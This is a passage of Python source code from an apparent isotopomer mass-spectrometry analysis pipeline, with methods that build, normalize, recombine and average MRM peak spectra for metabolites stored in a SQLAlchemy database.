'accoa':['C23H37N7O17P3S-','C23H36N7O14P2S-','C13H23N2O10P2S-','C10H14N5O10P2-','C10H12N5O9P2-','C10H11N5O6P-'],
'acon-C':['C6H5O6-','C6H3O5-','C5H5O4-'],
'akg':['C5H5O5-','C4H5O3-','C2HO3-'],
'amp':['C5H4N5-','C10H13N5O7P-'],
'asp-L':['C4H6NO4-','C4H6NO2-','C4H3O4-','C3H6NO2-'],
'atp':['C10H15N5O13P3-','C10H14N5O10P2-','C10H12N5O9P2-','C10H11N5O6P-'],
'dhap':['C3H6O6P-'],
'fad':['C27H32N9O15P2-','C17H18N4O8P-','C10H13N5O7P-'],
'fdp':['C6H13O12P2-','C6H10O8P-'],
'g1p':['C6H12O9P-'],
'g6p':['C6H12O9P-','C4H8O7P-'],
'glu-L':['C5H8NO4-','C5H6NO3-'],
'glyc3p':['C3H8O6P-'],
'glyclt':['CH3O2-','C2H3O3-'],
'icit':['C6H7O7-','C6H5O6-','C5H3O3-'],
'mal-L':['C4H5O5-','C4H3O4-'],
'met-L':['CH3S-','C5H10NO2S-'],
'pep':['C3H4O6P-'],
'phe-L':['C9H7O2-','C9H10NO2-'],
'phpyr':['C9H7O3-','C8H7O','C7H7-'],
'Pool_2pg_3pg':['C3H6O7P-'],
'prpp':['C5H9O10P2-','C5H12O14P3-'],
'pyr':['C3H3O3-'],
'ru5p-D':['C5H10O8P-'],
's7p':['C7H14O10P-'],
'skm':['C7H9O5-','C6H5O-'],
'succ':['C4H5O4-','C4H3O3-'],
'thr-L':['C4H8NO3-'],
'ump':['C9H9N2O6-','C9H12N2O9P-','C4H3N2O2-']};
#analyses not tested:
def execute_removeDuplicateDilutions(self,experiment_id_I,component_names_dil_I = []):
'''remove duplicate dilutions from data_stage01_isotopomer_normalized
NOTE: rows are not removed, but the used value is changed to false
NOTE: priority is given to the 1x dilution (i.e. 10x dilutions are removed
if a 1x and 10x are both used'''
# Input:
# experiment_id_I = experiment
# component_names_dil_I = component names for which the dilution will be prioritized
print('execute_removeDuplicateDilutions...')
# get sample names
sample_ids = [];
sample_ids = self.stage01_isotopomer_query.get_sampleIDs_experimentID_dataStage01Normalized(experiment_id_I);
for si in sample_ids:
# get component names
component_names = [];
component_names = self.stage01_isotopomer_query.get_componentsNames_experimentIDAndSampleID_dataStage01Normalized(experiment_id_I,si);
for cn in component_names:
# get dilutions
sample_dilutions = [];
sample_dilutions = self.stage01_isotopomer_query.get_sampleDilutions_experimentIDAndSampleIDAndComponentName_dataStage01Normalized(experiment_id_I,si,cn);
if len(sample_dilutions)<2: continue;
# find the minimum and maximum dilution
min_sample_dilution = min(sample_dilutions);
max_sample_dilution = max(sample_dilutions);
for sd in sample_dilutions:
# prioritize undiluted samples if not in the dilution list
# i.e. diluted samples used_ are set to FALSE
if not(cn in component_names_dil_I) and not(sd == min_sample_dilution):
# get the sample name
sample_name = self.stage01_isotopomer_query.get_sampleName_experimentIDAndSampleIDAndSampleDilution_dataStage01Normalized(experiment_id_I,si,sd);
try:
data_update = self.session.query(data_stage01_isotopomer_normalized).filter(
data_stage01_isotopomer_normalized.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_normalized.sample_name.like(sample_name),
data_stage01_isotopomer_normalized.component_name.like(cn)).update(
{'used_': False},synchronize_session=False);
except SQLAlchemyError as e:
print(e);
# prioritize diluted samples if in the dilution list
# i.e. undiluted samples used_ are set to FALSE
if (cn in component_names_dil_I) and not(sd == max_sample_dilution):
# get the sample name
sample_name = self.stage01_isotopomer_query.get_sampleName_experimentIDAndSampleIDAndSampleDilution_dataStage01Normalized(experiment_id_I,si,sd);
try:
data_update = self.session.query(data_stage01_isotopomer_normalized).filter(
data_stage01_isotopomer_normalized.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_normalized.sample_name.like(sample_name),
data_stage01_isotopomer_normalized.component_name.like(cn)).update(
{'used_': False},synchronize_session=False);
except SQLAlchemyError as e:
print(e);
self.session.commit();
def execute_removeDuplicateComponents(self,experiment_id_I):
'''remove duplicate components from data_stage01_isotopomer_normalized
NOTE: rows are not removed, but the used value is changed to false
NOTE: priority is given to the primary transition'''
return
#analyses tested:
def execute_buildSpectrumFromMRMs(self,experiment_id_I,ms_methodtype_I='isotopomer_13C',sample_name_abbreviations_I=[],sample_names_I=[],met_ids_I=[]):
'''Extract peak spectrum for each fragment from MRMs'''
# Input:
# experiment_id
# sample_names = (optional) list of specific samples
# Output:
# sample_name
# sample_id
# component_group_name
# component_name
# calculated_concentration
# calculated_concentration_units
# used_
# assumptions:
# 1. there is only spectrum of MRMs for each components
print('build_precursorSpectrumFromMRMs...')
# get time points
time_points = self.stage01_isotopomer_query.get_timePoint_experimentID(experiment_id_I);
for tp in time_points:
print('Building precursor and product spectrum from MRMs for time-point ' + str(tp));
# get dilutions
dilutions = self.stage01_isotopomer_query.get_sampleDilution_experimentIDAndTimePoint(experiment_id_I,tp);
for dil in dilutions:
print('Building precursor and product spectrum from MRMs for dilution ' + str(dil));
if sample_names_I:
sample_abbreviations = [];
for sn in sample_names_I:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleName(experiment_id_I,sn);
sample_abbreviations.extend(sample_abbreviations_tmp);
elif sample_name_abbreviations_I:
sample_abbreviations = sample_name_abbreviations_I;
else:
# get sample names and sample name short
sample_abbreviations = [];
sample_types = ['Unknown','QC'];
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePointAndDilution(experiment_id_I,st,tp,dil);
sample_abbreviations.extend(sample_abbreviations_tmp);
for sna_cnt,sna in enumerate(sample_abbreviations):
print('Building precursor and product spectrum from MRMs for sample name abbreviation ' + sna);
##BUG alert:
##there is a potential bug whereby if the entire spectra per compound is not returned
##e.g. one of the samples is not returned because "used_" is set to false in isotopomer_MQResultsTable
##the spectra could potentially be shifted
##get_componentsNamesAndOther_experimentIDAndSampleNameAndMSMethodTypeAndTimePointAndDilution has been adjusted to
##return all component_names even if the sample from which it came is not "used_" as a temporary fix
##this works for C12 validation experiments, but
##the results of normalization will need to be monitored until a more robust method is established
##UPDATE to BUG:
##'met_cnt_max = len(component_names)-1' changed to 'met_cnt_max = len(component_names)' and
##get_sampleNamesAndReplicateNumbersAndSampleTypes_experimentIDAndSampleNameAbbreviationAndSampleDescriptionAndTimePointAndDilution added
##so that the last component is included in the met/fragment spectra even when not all component names have "used_"
##set to true in isotopomer_MQResultsTable
# component names, group names, fragment formula, and fragment mass
if met_ids_I:
component_names,component_group_names,\
precursor_formulas_O, precursor_masses_O,\
product_formulas_O, product_masses_O = [],[],[],[],[],[];
for met in met_ids_I:
component_names_tmp,component_group_names_tmp,\
precursor_formulas_tmp, precursor_masses_tmp,\
product_formulas_tmp, product_masses_tmp = [],[],[],[],[],[];
component_names_tmp,component_group_names_tmp,\
precursor_formulas_tmp, precursor_masses_tmp,\
product_formulas_tmp, product_masses_tmp = \
self.stage01_isotopomer_query.get_componentsNamesAndOther_experimentIDAndSampleNameAndMSMethodTypeAndTimePointAndDilutionAndMetID( \
experiment_id_I,sna,ms_methodtype_I,tp,dil,met);
if not(component_names_tmp): continue #no component information was found
component_names.extend(component_names_tmp)
component_group_names.extend(component_group_names_tmp)
precursor_formulas_O.extend(precursor_formulas_tmp)
precursor_masses_O.extend(precursor_masses_tmp)
product_formulas_O.extend(product_formulas_tmp)
product_masses_O.extend(product_masses_tmp)
else:
component_names,component_group_names,\
precursor_formulas_O, precursor_masses_O,\
product_formulas_O, product_masses_O = [],[],[],[],[],[];
component_names,component_group_names,\
precursor_formulas_O, precursor_masses_O,\
product_formulas_O, product_masses_O = \
self.stage01_isotopomer_query.get_componentsNamesAndOther_experimentIDAndSampleNameAndMSMethodTypeAndTimePointAndDilution( \
experiment_id_I,sna,ms_methodtype_I,tp,dil);
if not(component_names): continue #no component information was found
# extract unique met ids and precursor formula id
met_ids_unique = [];
met_ids = [];
#precursor_formulas_unique = [];
#product_formulas_unique = [];
met_id = '';
met_id_old = '';
# algorithm works because lists are ordered by component_names
for i,cn in enumerate(component_names):
met_id = cn.split('.')[0];
met_ids.append(met_id);
if met_id != met_id_old:
met_id_old = met_id;
met_ids_unique.append(met_id);
#precursor_formulas_unique.append(precursor_formulas_O[i]);
#product_formulas_unique.append(product_formulas_O[i]);
# get precursor and productformulas for each unique met id:
precursor_formulas_unique = [];
product_formulas_unique = [];
for met in met_ids_unique:
precursor_formula,product_formula = None,None;
precursor_formula,product_formula = self.stage01_isotopomer_query.get_precursorFormulaAndProductFormula_metID(met,'-','isotopomer_13C')
precursor_formulas_unique.append(precursor_formula);
product_formulas_unique.append(product_formula);
# build precursor and spectrum for each met
met_all_cnt = 0;
met_cnt_max = len(component_names); # for use in a while loop
for i,met in enumerate(met_ids_unique):
print('Building precursor and product spectrum from MRMs for metabolite ' + met);
# get filtrate samples
precursorFiltrate_measured = {};
productFiltrate_measured = {};
#precursorFiltrate_measured[precursor_formulas_unique[i]] = None; #keep track of all met_ids
precursorFiltrate = {};
productFiltrate = {};
met_cnt = met_all_cnt;
# iterate through mets/fragments then sample names in order to calculate the average for each component_name (fragment/mass)
while met_cnt < met_cnt_max and met==met_ids[met_cnt]:
# get filtrate sample names
sample_names = [];
replicate_numbers = [];
sample_description = 'Filtrate';
sample_names,replicate_numbers,sample_types = self.stage01_isotopomer_query.get_sampleNamesAndReplicateNumbersAndSampleTypes_experimentIDAndSampleNameAbbreviationAndSampleDescriptionAndComponentNameAndTimePointAndDilution(experiment_id_I,sna,sample_description,component_names[met_cnt],tp,dil);
intensities = [];
for sn_cnt,sn in enumerate(sample_names):
# get intensities
intensity = None;
intensity = self.stage01_isotopomer_query.get_peakHeight_sampleNameAndComponentName(sn,component_names[met_cnt]);
if not(intensity): continue
intensities.append(intensity);
n_replicates = len(intensities);
intensities_average_filtrate = 0.0;
intensities_var_filtrate = 0.0;
# calculate average and CV of the intensities
if (not(intensities)): intensities_average_filtrate = 0.0;
elif n_replicates<2: intensities_average_filtrate = intensities[0];
else:
#intensities_average_filtrate, intensities_var_filtrate = self.calculate.calculate_ave_var_R(intensities);
intensities_average_filtrate = numpy.mean(numpy.array(intensities));
intensities_var_filtrate = numpy.var(numpy.array(intensities));
# append value to dictionary
precursorFiltrate[(precursor_masses_O[met_cnt],product_masses_O[met_cnt])] = intensities_average_filtrate;
productFiltrate[(precursor_masses_O[met_cnt],product_masses_O[met_cnt])] = intensities_average_filtrate;
met_cnt += 1;
precursorFiltrate_measured[precursor_formulas_unique[i]] = precursorFiltrate
productFiltrate_measured[product_formulas_unique[i]] = productFiltrate
# get broth samples
sample_names = [];
sample_description = 'Broth';
sample_names,replicate_numbers,sample_types = self.stage01_isotopomer_query.get_sampleNamesAndReplicateNumbersAndSampleTypes_experimentIDAndSampleNameAbbreviationAndSampleDescriptionAndTimePointAndDilution(experiment_id_I,sna,sample_description,tp,dil);
#sample_names,replicate_numbers,sample_types = self.stage01_isotopomer_query.get_sampleNamesAndReplicateNumbersAndSampleTypes_experimentIDAndSampleNameAbbreviationAndSampleDescriptionAndComponentNameAndTimePointAndDilution(experiment_id_I,sna,sample_description,component_names[met_cnt],tp,dil);
# iterate through sample names then mets/fragments in order to calculate the spectrum for each sample and component
for sn_cnt,sn in enumerate(sample_names):
print('Building precursor and product spectrum from MRMs for sample ' + sn);
precursorPeakSpectrum_measured = {};
precursorPeakSpectrum_corrected = {};
productPeakSpectrum_measured = {};
productPeakSpectrum_corrected = {};
#precursorPeakSpectrum_measured[precursor_formulas_unique[i]] = None; #keep track of all met_ids
#precursorPeakSpectrum_corrected[precursor_formulas_unique[i]] = None; #keep track of all met_ids
precursorMeasured = {};
precursorCorrected = {};
productMeasured = {};
productCorrected = {};
met_cnt = met_all_cnt;
while met_cnt < met_cnt_max and met==met_ids[met_cnt]:
# get intensities
intensity = None;
intensity = self.stage01_isotopomer_query.get_peakHeight_sampleNameAndComponentName(sn,component_names[met_cnt]);
if not(intensity):
precursorMeasured[(precursor_masses_O[met_cnt],product_masses_O[met_cnt])] = 0.0;
productMeasured[(precursor_masses_O[met_cnt],product_masses_O[met_cnt])] = 0.0;
else:
precursorMeasured[(precursor_masses_O[met_cnt],product_masses_O[met_cnt])] = intensity;
productMeasured[(precursor_masses_O[met_cnt],product_masses_O[met_cnt])] = intensity;
#if precursorFiltrate_measured[precursor_formulas_unique[i]][(precursor_masses_O[met_cnt],product_masses_O[met_cnt])] < 0.5*intensity:
# corrected_intensity = intensity - precursorFiltrate_measured[precursor_formulas_unique[i]][(precursor_masses_O[met_cnt],product_masses_O[met_cnt])];
#else: corrected_intensity = 0.0;
#precursorCorrected[(precursor_masses_O[met_cnt],product_masses_O[met_cnt])] = corrected_intensity;
met_cnt += 1;
precursorPeakSpectrum_measured[precursor_formulas_unique[i]] = precursorMeasured;
productPeakSpectrum_measured[product_formulas_unique[i]] = productMeasured;
# generate normalized spectrum for the precursor:
precursorPeakSpectrum_measured, precursorPeakSpectrum_corrected, precursorPeakSpectrum_normalized \
= self.build_precursorSpectrumFromMRMs(precursorPeakSpectrum_measured,precursorFiltrate_measured);
peakSpectrum_stats_O,precursorPeakSpectrum_theoretical = self.compare_peakSpectrum_normMax([precursorPeakSpectrum_normalized],True);
# update data_stage01_isotopomer_normalized
if precursorPeakSpectrum_theoretical[precursor_formulas_unique[i]]:
for k,v in precursorPeakSpectrum_theoretical[precursor_formulas_unique[i]].items():
row1 = None;
row1 = data_stage01_isotopomer_normalized(experiment_id_I,sn,sna,sample_types[sn_cnt],tp,dil,replicate_numbers[sn_cnt],
met,precursor_formulas_unique[i],int(numpy.round(k)),
precursorPeakSpectrum_measured[precursor_formulas_unique[i]][k],'cps',
precursorPeakSpectrum_corrected[precursor_formulas_unique[i]][k],'cps',
precursorPeakSpectrum_normalized[precursor_formulas_unique[i]][k],'normMax',
v,peakSpectrum_stats_O[precursor_formulas_unique[i]][k]['absDev'],'MRM',True,None);
self.session.add(row1);
# generate normalized spectrum for the product:
productPeakSpectrum_measured, productPeakSpectrum_corrected, productPeakSpectrum_normalized \
= self.build_productSpectrumFromMRMs(productPeakSpectrum_measured,productFiltrate_measured);
peakSpectrum_stats_O,productPeakSpectrum_theoretical = self.compare_peakSpectrum_normMax([productPeakSpectrum_normalized],True);
# update data_stage01_isotopomer_normalized
if productPeakSpectrum_theoretical[product_formulas_unique[i]]:
for k,v in productPeakSpectrum_theoretical[product_formulas_unique[i]].items():
row2 = None;
row2 = data_stage01_isotopomer_normalized(experiment_id_I,sn,sna,sample_types[sn_cnt],tp,dil,replicate_numbers[sn_cnt],
met,product_formulas_unique[i],int(numpy.round(k)),
productPeakSpectrum_measured[product_formulas_unique[i]][k],'cps',
productPeakSpectrum_corrected[product_formulas_unique[i]][k],'cps',
productPeakSpectrum_normalized[product_formulas_unique[i]][k],'normMax',
v,peakSpectrum_stats_O[product_formulas_unique[i]][k]['absDev'],'MRM',True,None);
self.session.add(row2);
met_all_cnt = met_cnt
self.session.commit();
def execute_updateNormalizedSpectrum(self,experiment_id_I, sample_names_I = None, sample_name_abbreviations_I = None, met_ids_I = None, scan_types_I = None):
'''re-calculate intensity_normalized from intensity_corrected and used'''
print('execute_updateNormalizedSpectrum...')
# get time points
time_points = self.stage01_isotopomer_query.get_timePoint_experimentID_dataStage01Normalized(experiment_id_I);
for tp in time_points:
print('Building precursor and product spectrum from isotopomer normalized for time-point ' + str(tp));
dataListUpdated = [];
# get dilutions
dilutions = [];
dilutions = self.stage01_isotopomer_query.get_sampleDilution_experimentIDAndTimePoint_dataStage01Normalized(experiment_id_I,tp);
for dil in dilutions:
print('Building precursor and product spectrum from isotopomer normalized for dilution ' + str(dil));
if sample_names_I:
sample_abbreviations = [];
sample_types = ['Unknown','QC'];
for sn in sample_names_I:
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePointAndDilutionAndSampleName_dataStage01Normalized(experiment_id_I,st,tp,dil,sn);
sample_abbreviations.extend(sample_abbreviations_tmp);
elif sample_name_abbreviations_I:
sample_abbreviations = sample_name_abbreviations_I;
else:
# get sample names and sample name abbreviations
sample_abbreviations = [];
sample_types = ['Unknown','QC'];
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePointAndDilution_dataStage01Normalized(experiment_id_I,st,tp,dil);
sample_abbreviations.extend(sample_abbreviations_tmp);
for sna_cnt,sna in enumerate(sample_abbreviations):
print('Building precursor and product spectrum from isotopomer normalized for sample name abbreviation ' + sna);
# get the scan_types
if scan_types_I:
scan_types = scan_types_I;
else:
scan_types = [];
scan_types = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndDilutionAndSampleAbbreviations_dataStage01Normalized(experiment_id_I,tp,dil,sna);
for scan_type in scan_types:
print('Building precursor and product spectrum for scan type ' + scan_type)
# met_ids
if not met_ids_I:
met_ids = [];
met_ids = self.stage01_isotopomer_query.get_metIDs_experimentIDAndSampleAbbreviationAndTimePointAndDilutionAndScanType_dataStage01Normalized( \
experiment_id_I,sna,tp,dil,scan_type);
else:
met_ids = met_ids_I;
if not(met_ids): continue #no component information was found
for met in met_ids:
print('Building precursor and product spectrum from isotopomer normalized for metabolite ' + met);
# get sample names
sample_names = [];
sample_names,replicate_numbers,sample_types = self.stage01_isotopomer_query.get_sampleNamesAndReplicateNumbersAndSampleTypes_experimentIDAndSampleNameAbbreviationAndMetIDAndTimePointAndDilutionAndScanType_dataStage01Normalized(experiment_id_I,sna,met,tp,dil,scan_type);
# iterate through sample names then mets/fragments in order to calculate the spectrum for each sample and component
for sn_cnt,sn in enumerate(sample_names):
print('Building precursor and product spectrum from isotopomer normalized for sample ' + sn);
# get peak data for the sample/met_id/scan_type
peak_data = [];
peak_data = self.stage01_isotopomer_query.get_data_experimentIDAndSampleNameAndMetIDAndAndScanType_normalized(experiment_id_I,sn,met,scan_type);
fragment_formulas = list(peak_data.keys());
peakSpectrum_corrected, peakSpectrum_normalized = self.extract_peakList_normMax(\
peak_data, fragment_formulas, True);
peakSpectrum_stats,peakSpectrum_theoretical = self.compare_peakSpectrum_normMax([peakSpectrum_normalized],True);
# update data_stage01_isotopomer_normalized
for frag,spec in peakSpectrum_theoretical.items():
if spec:
fragment_str = re.sub('[+-]', '', frag);
fragment_mass = Formula(fragment_str).isotope.mass;
for k,v in peakSpectrum_theoretical[frag].items():
dataListUpdated.append({'experiment_id':experiment_id_I,
'sample_name':sn,
'sample_name_abbreviation':sna,
'sample_type':sample_types[sn_cnt],
'time_point':tp,
'dilution':dil,
'replicate_number':replicate_numbers[sn_cnt],
'met_id':met,
'fragment_formula':frag,
'fragment_mass':int(numpy.round(k)),
'intensity_corrected':peakSpectrum_corrected[frag][k],
'intensity_corrected_units':'cps',
'intensity_normalized':peakSpectrum_normalized[frag][k],
'intensity_normalized_units':'normMax',
'intensity_theoretical':v,
'abs_devFromTheoretical':peakSpectrum_stats[frag][k]['absDev'],
'scan_type':scan_type});
self.stage01_isotopomer_query.update_data_stage01_isotopomer_normalized(dataListUpdated);
def execute_recombineNormalizedSpectrum(self,experiment_id_I, sample_names_I = None, sample_name_abbreviations_I = None, met_ids_I = None):
'''recombine intensity_normalized from a lower and higher dilution'''
'''Assumptions:
only a single fragment:spectrum is used_ per sample name abbreviation, time-point, replicate, scan_type
(i.e. there are no multiple dilutions of the same precursor:spectrum that are used_)
'''
print('execute_recombineNormalizedSpectrum...')
# get time points
time_points = self.stage01_isotopomer_query.get_timePoint_experimentIDAndComment_dataStage01Normalized(experiment_id_I,'Recombine');
for tp in time_points:
print('recombining spectrum for time-point ' + str(tp));
dataListUpdated = [];
if sample_names_I:
sample_abbreviations = [];
sample_types = ['Unknown','QC'];
for sn in sample_names_I:
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePointAndSampleNameAndComment_dataStage01Normalized(experiment_id_I,st,tp,sn,'Recombine');
sample_abbreviations.extend(sample_abbreviations_tmp);
elif sample_name_abbreviations_I:
sample_abbreviations = sample_name_abbreviations_I;
else:
# get sample names and sample name abbreviations
sample_abbreviations = [];
sample_types = ['Unknown','QC'];
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePointAndComment_dataStage01Normalized(experiment_id_I,st,tp,'Recombine');
sample_abbreviations.extend(sample_abbreviations_tmp);
for sna_cnt,sna in enumerate(sample_abbreviations):
print('recombining spectrum for sample name abbreviation ' + sna);
# get the scan_types
scan_types = [];
scan_types = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndComment_dataStage01Normalized(experiment_id_I,tp,sna,'Recombine');
for scan_type in scan_types:
print('recombining spectrum for scan type ' + scan_type)
# met_ids
if not met_ids_I:
met_ids = [];
met_ids = self.stage01_isotopomer_query.get_metIDs_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndComment_dataStage01Normalized( \
experiment_id_I,sna,tp,scan_type,'Recombine');
else:
met_ids = met_ids_I;
if not(met_ids): continue #no component information was found
for met in met_ids:
print('recombining spectrum for metabolite ' + met);
# get replicates
replicate_numbers = [];
replicate_numbers = self.stage01_isotopomer_query.get_replicateNumbers_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndMetID_dataStage01Normalized( \
experiment_id_I,sna,tp,scan_type,met);
for rep in replicate_numbers:
print('recombining spectrum for replicate_number ' + str(rep));
#get data
peakData_I = {};
peakData_I = self.stage01_isotopomer_query.get_data_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndMetIDAndReplicateNumber_dataStage01Normalized( \
experiment_id_I,sna,tp,scan_type,met,rep);
peakData_O,peakData_O_false,peakData_intensities_O = self.recombine_dilutionsMRMs(peakData_I);
peakSpectrum_stats = self.compare_peakSpectrum_normMax([peakData_intensities_O]);
# update data_stage01_isotopomer_normalized
for frag,spec in peakSpectrum_stats.items():
if spec:
fragment_str = re.sub('[+-]', '', frag);
fragment_mass = Formula(fragment_str).isotope.mass;
for k,v in peakSpectrum_stats[frag].items():
if int(numpy.round(k)) in peakData_O[frag]:
dataListUpdated.append({'experiment_id':experiment_id_I,
'sample_name_abbreviation':sna,
'time_point':tp,
'dilution':peakData_O[frag][int(numpy.round(k))]['dilution'],
'replicate_number':rep,
'met_id':met,
'fragment_formula':frag,
'fragment_mass':int(numpy.round(k)),
'intensity_normalized':peakData_O[frag][int(numpy.round(k))]['intensity'],
'intensity_normalized_units':'normMax',
'abs_devFromTheoretical':v['absDev'],
'scan_type':scan_type,
'used_':peakData_O[frag][int(numpy.round(k))]['used_'],
'comment_':peakData_O[frag][int(numpy.round(k))]['comment_']});
# update data_stage01_isotopomer_normalized (rows changed to false)
for frag,spec in peakData_O_false.items():
if spec:
fragment_str = re.sub('[+-]', '', frag);
fragment_mass = Formula(fragment_str).isotope.mass;
for k,v in peakData_O_false[frag].items():
if v:
dataListUpdated.append({'experiment_id':experiment_id_I,
'sample_name_abbreviation':sna,
'time_point':tp,
'dilution':v['dilution'],
'replicate_number':rep,
'met_id':met,
'fragment_formula':frag,
'fragment_mass':int(numpy.round(k)),
'intensity_normalized':v['intensity'],
'intensity_normalized_units':'normMax',
'abs_devFromTheoretical':None,
'scan_type':scan_type,
'used_':v['used_'],
'comment_':v['comment_']});
self.stage01_isotopomer_query.update_data_stage01_isotopomer_normalized(dataListUpdated);
def execute_analyzeAverages(self,experiment_id_I, sample_names_I = None, sample_name_abbreviations_I = None, met_ids_I = None, scan_types_I = None):
'''calculate the average normalized intensity for MRM samples'''
'''Assumptions:
only a single fragment:spectrum is used_ per sample name abbreviation, time-point, replicate, scan_type
(i.e. there are no multiple dilutions of the same precursor:spectrum that are used_)
'''
print('execute_analyzeAverages...')
# get time points
time_points = self.stage01_isotopomer_query.get_timePoint_experimentID_dataStage01Normalized(experiment_id_I);
for tp in time_points:
print('Calculating average precursor and product spectrum from isotopomer normalized for time-point ' + str(tp));
if sample_names_I:
sample_abbreviations = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for sn in sample_names_I:
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePointAndSampleName_dataStage01Normalized(experiment_id_I,st,tp,sn);
sample_abbreviations.extend(sample_abbreviations_tmp);
sample_types_lst.extend([st for i in range(len(sample_names_tmp))]);
elif sample_name_abbreviations_I:
sample_abbreviations = sample_name_abbreviations_I;
sample_types_lst = ['Unknown' for x in sample_abbreviations];
# query sample types from sample name abbreviations and time-point from data_stage01_isotopomer_normalized
else:
# get sample names and sample name abbreviations
sample_abbreviations = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePoint_dataStage01Normalized(experiment_id_I,st,tp);
sample_abbreviations.extend(sample_abbreviations_tmp);
sample_types_lst.extend([st for i in range(len(sample_abbreviations_tmp))]);
for sna_cnt,sna in enumerate(sample_abbreviations):
print('Calculating average precursor and product spectrum from isotopomer normalized for sample name abbreviation ' + sna);
# get the scan_types
if scan_types_I:
scan_types = [];
scan_types_tmp = [];
scan_types_tmp = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01Normalized(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
scan_types = [st for st in scan_types_tmp if st in scan_types_I];
else:
scan_types = [];
scan_types = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01Normalized(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
for scan_type in scan_types:
print('Calculating average precursor and product spectrum for scan type ' + scan_type)
# met_ids
if not met_ids_I:
met_ids = [];
met_ids = self.stage01_isotopomer_query.get_metIDs_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanType_dataStage01Normalized( \
experiment_id_I,sna,tp,sample_types_lst[sna_cnt],scan_type);
else:
met_ids = met_ids_I;
if not(met_ids): continue #no component information was found
for met in met_ids:
print('Calculating average precursor and product spectrum for metabolite ' + met);
## get fragment formulas and masses
#fragment_formulas, fragment_masses = [],[];
#fragment_formulas,fragment_masses = self.stage01_isotopomer_query.get_fragmentFormulasAndMass_experimentIDAndSampleAbbreviationAndTimePointAndAndSampleTypeAndScanTypeAndMetID_dataStage01Normalized(experiment_id_I,sna,tp,sample_types_lst[sna_cnt],scan_type,met);
#for mass_cnt,mass in enumerate(fragment_masses):
# print 'Calculating average precursor and product spectrum for fragment/mass ' + fragment_formulas[mass_cnt] + '/' + str(mass);
# # get data
# intensities = [];
# intensities = self.stage01_isotopomer_query.get_normalizedIntensity_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndMetIDAndFragmentFormulaAndMassAndScanType_dataStage01Normalized(experiment_id_I,sna,tp,sample_types_lst[sna_cnt],met,fragment_formulas[mass_cnt],mass,scan_type);
# # calculate the average and cv
# n_replicates = len(intensities);
# intensities_average = 0.0;
# intensities_var = 0.0;
# intensities_cv = 0.0;
# # calculate average and CV of intensities
# if (not(intensities)):
# #continue
# intensities_average = 0.0;
# intensities_var = 0.0;
# intensities_cv = 0.0;
# elif n_replicates<2: # require at least 2 replicates
# #continue
# intensities_average = 0.0;
# intensities_var = 0.0;
# intensities_cv = 0.0;
# else:
# intensities_average = numpy.mean(numpy.array(intensities));
# intensities_var = numpy.var(numpy.array(intensities));
# if (intensities_average <= 0.0): intensities_cv = 0.0;
# else: intensities_cv = sqrt(intensities_var)/intensities_average*100;
# # calculate the theoretical spectrum for the pecursor/mass
# peakSpectrum_theoretical = self.report_fragmentSpectrum_normMax([fragment_formulas[mass_cnt]],True);
# # calculate the absolute deviation from the theoretical
# intensity_theoretical = peakSpectrum_theoretical[fragment_formulas[mass_cnt]][mass];
# if intensity_theoretical > 0.0:abs_devFromTheoretical = abs(intensity_theoretical-intensities_average)/intensity_theoretical*100;
# else: abs_devFromTheoretical = None;
# # add to data_stage01_isotopomer_averages
# row = [];
# row = data_stage01_isotopomer_averages(experiment_id_I, sna, sample_types_lst[sna_cnt], tp, met,fragment_formulas[mass_cnt], mass,
# n_replicates, intensities_average, intensities_cv,
# 'normMax', intensity_theoretical, abs_devFromTheoretical, scan_type, True)
# self.session.add(row);
# get replicates
replicate_numbers = [];
replicate_numbers = self.stage01_isotopomer_query.get_replicateNumbers_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndMetID_dataStage01Normalized( \
experiment_id_I,sna,tp,scan_type,met);
peakSpectrum_normalized_lst = [];
for rep in replicate_numbers:
print('Calculating average precursor and product spectrum for replicate_number ' + str(rep));
#get data
peakData_I = {};
peakData_I = self.stage01_isotopomer_query.get_dataNormalized_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndMetIDAndReplicateNumber_dataStage01Normalized( \
experiment_id_I,sna,tp,scan_type,met,rep);
fragment_formulas = list(peakData_I.keys());
peakSpectrum_corrected, peakSpectrum_normalized = self.extract_peakList_normMax(\
peakData_I, fragment_formulas, True);
peakSpectrum_normalized_lst.append(peakSpectrum_normalized);
